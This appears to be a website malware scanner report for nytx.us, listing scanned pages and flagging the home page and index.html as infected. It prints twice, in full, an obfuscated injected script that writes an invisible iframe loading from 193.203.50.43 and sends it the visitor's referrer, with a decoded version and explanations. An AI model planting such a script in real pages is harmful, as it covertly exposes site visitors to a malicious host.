Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nytx.us
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nytx.us/ | 200 OK Content-Length: 13459 Content-Type: text/html | malicious |
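Malicious code found. Script contains blacklisted domain: 193.203.50.43
Injected script: var x = 'h' + 't' + 't' + 'p' + ':' + '/' + '/' + '1' + '9' + '3' + '.' + '2' + '0' + '3' + '.' + '5' + '0' + '.' + '4' + '3'; var group = 'f' + 't' + 'p'; var charset = 'u' + 't' + 'f' + '-' + '8'; var rrr = encodeURIComponent(document.referrer); var url = x + '/?' + group + '&se_rrr=' + rrr + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '=' + '"' + url + '"' + '>' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>');
Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe>
Note: the flagged value is an IP address rather than a domain name. The script writes a zero-size (invisible) iframe that loads from that host and sends it the visitor's URL-encoded document.referrer in the se_rrr parameter. Every string is assembled from single characters, presumably so that the address and the iframe tag do not appear literally in the page source. The "undefined" in the decoded output most likely reflects the scanner's emulated environment, where document.referrer was not set; a real browser would send the actual referrer, or an empty value if there is none. | ||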
http://nytx.us/scripts/museutils.js?441941709 | 200 OK Content-Length: 25574 Content-Type: application/javascript | clean |
http://nytx.us/scripts/webpro.js?197321703 | 200 OK Content-Length: 36609 Content-Type: application/javascript | clean |
http://nytx.us/scripts/musewpslideshow.js?4283859919 | 200 OK Content-Length: 12759 Content-Type: application/javascript | clean |
http://nytx.us/scripts/jquery.museoverlay.js?3836522771 | 200 OK Content-Length: 3123 Content-Type: application/javascript | clean |
http://nytx.us/scripts/touchswipe.js?4156838003 | 200 OK Content-Length: 4378 Content-Type: application/javascript | clean |
http://nytx.us/scripts/jquery.musemenu.js?3788803530 | 200 OK Content-Length: 5283 Content-Type: application/javascript | clean |
http://nytx.us/index.html | 200 OK Content-Length: 13459 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 193.203.50.43
Injected script: var x = 'h' + 't' + 't' + 'p' + ':' + '/' + '/' + '1' + '9' + '3' + '.' + '2' + '0' + '3' + '.' + '5' + '0' + '.' + '4' + '3'; var group = 'f' + 't' + 'p'; var charset = 'u' + 't' + 'f' + '-' + '8'; var rrr = encodeURIComponent(document.referrer); var url = x + '/?' + group + '&se_rrr=' + rrr + '&charset=' + charset; document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '=' + '"' + url + '"' + '>' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>');
Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://193.203.50.43/?ftp&se_rrr=undefined&charset=utf-8"></iframe>
Note: this is the same injected script reported for http://nytx.us/, and the response has the same Content-Length (13459), so both URLs appear to serve the same infected document. Cleaning the site means removing the script from that file, not just from one URL. The "undefined" in the decoded output most likely reflects the scanner's emulated environment, where document.referrer was not set. | ||
http://nytx.us/about.html | 200 OK Content-Length: 11219 Content-Type: text/html | clean |
http://nytx.us/brokerage.html | 200 OK Content-Length: 10703 Content-Type: text/html | clean |
http://nytx.us/call.html | 200 OK Content-Length: 11703 Content-Type: text/html | clean |
http://nytx.us/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nytx.us
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 05:00:05 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 13459
Content-Type: text/html
Last-Modified: Fri, 06 Dec 2013 04:00:02 GMT
...13459 bytes of data.
GET / HTTP/1.1
Host: nytx.us
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 05:00:05 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 13459
Content-Type: text/html
Last-Modified: Fri, 06 Dec 2013 04:00:02 GMT
...13459 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nytx.us
Referer: http://www.google.com/search?q=nytx.us
Result:
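The result is similar to the first query. There are no suspicious redirects found. This check only compares HTTP responses: the hidden iframe reported under "Scanned pages/files" is written into the page by client-side script, so it does not show up here as a redirect, and a clean result in this section does not mean the page is clean.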
GET / HTTP/1.1
Host: nytx.us
Referer: http://www.google.com/search?q=nytx.us
Result:
The result is similar to the first query. There are no suspicious redirects found.